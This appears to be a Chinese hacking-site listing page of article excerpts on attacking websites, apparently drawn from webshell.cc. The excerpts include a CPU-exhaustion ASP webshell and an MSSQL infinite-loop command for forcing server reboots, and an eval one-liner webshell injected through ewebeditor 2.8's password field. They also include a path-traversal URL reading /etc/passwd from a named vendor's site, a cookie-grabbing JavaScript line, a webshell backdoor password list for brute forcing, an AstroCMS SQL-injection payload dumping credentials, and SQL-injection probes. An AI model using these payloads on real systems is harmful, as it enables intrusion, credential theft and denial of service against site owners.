Linux渗透第一节 - vi旁注
我其实并不精通Linux渗透,会的那丁点几乎都是跟小白学的,虽然学的很菜。今天小白在群里发了一个英国的虚拟主机。很显然php的webshell没有权限,那么她是怎么拿到管理权限的?反弹连接呗。不过她说,对于Linux不精通的人,她个人建议先从vi学起。当然了,现在她写的一些傻瓜化webshell有时一键就能搞定反弹连接。不过本章只讲,如何用vi来旁注服务器上的其他网站。 一个实际例子(实际上小白用...
WEBSHELL重启服务器的方法?
把下面代码保存成webshell.asp,然后访问。CPU暴。管理员重启。 <% for i = 1 to 100 i = 10 next %> DB-OWNER权限下让服务器重启 SQL命令:wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd– 收集一下。会有用的哦!!
ewebeditor 2.8 后台插马
ewebeditor 2.8 后台插上一句话 影响版本:2.8 商业版 攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’ 设置成功后,访问https://www.webshell.cc/ewebeditor/asp/config.asp文件即可, 一句话木马被写入到这个文件里面了.
nod32杀毒官方任意下载文件漏洞
漏洞证明: http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc/passwd http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc
ASP ASPX PHP 构造注入页面的代码
把下面的代码分别保存为ASP。PHP。ASPX Mssql: <!–#include file=”conn.asp”–> <% hid=request.QueryString(“id”) sql=”select * from admin where id=”&hid set rs=conn.execute (sql) %> Access: <% db=”asp...
google hack技术资料
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.webshell.cc是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:) 首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:webshell.cc 从返回的信息中,找...
手工抓取COOKIE
javascript:alert;window.clipboardData.setData('text',document.cookie); 在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了。
国内各类 WebShell 密码大全 爆破、社工用 webshell-password
国内各类 WebShell 后门密码大全,已剔除重复: 名称 密码 6.0 VIP(防破解版 12345 - yanghai或者168888 (中国数据) rinima . tg [D.s.T]会员专用WebShell darkst [HxHacK]华夏黑客联盟 192298273208298273192298273185298273187298273195298273 [华夏黑客小豪]Shell...
AstroCMS多重远程缺陷及修复
下载地址: http://www.astrocms.com/ 忘记密码处注射: /registration/forgot/ a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# id=6 - usually admin ...
SQL 手工注入大全
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssq...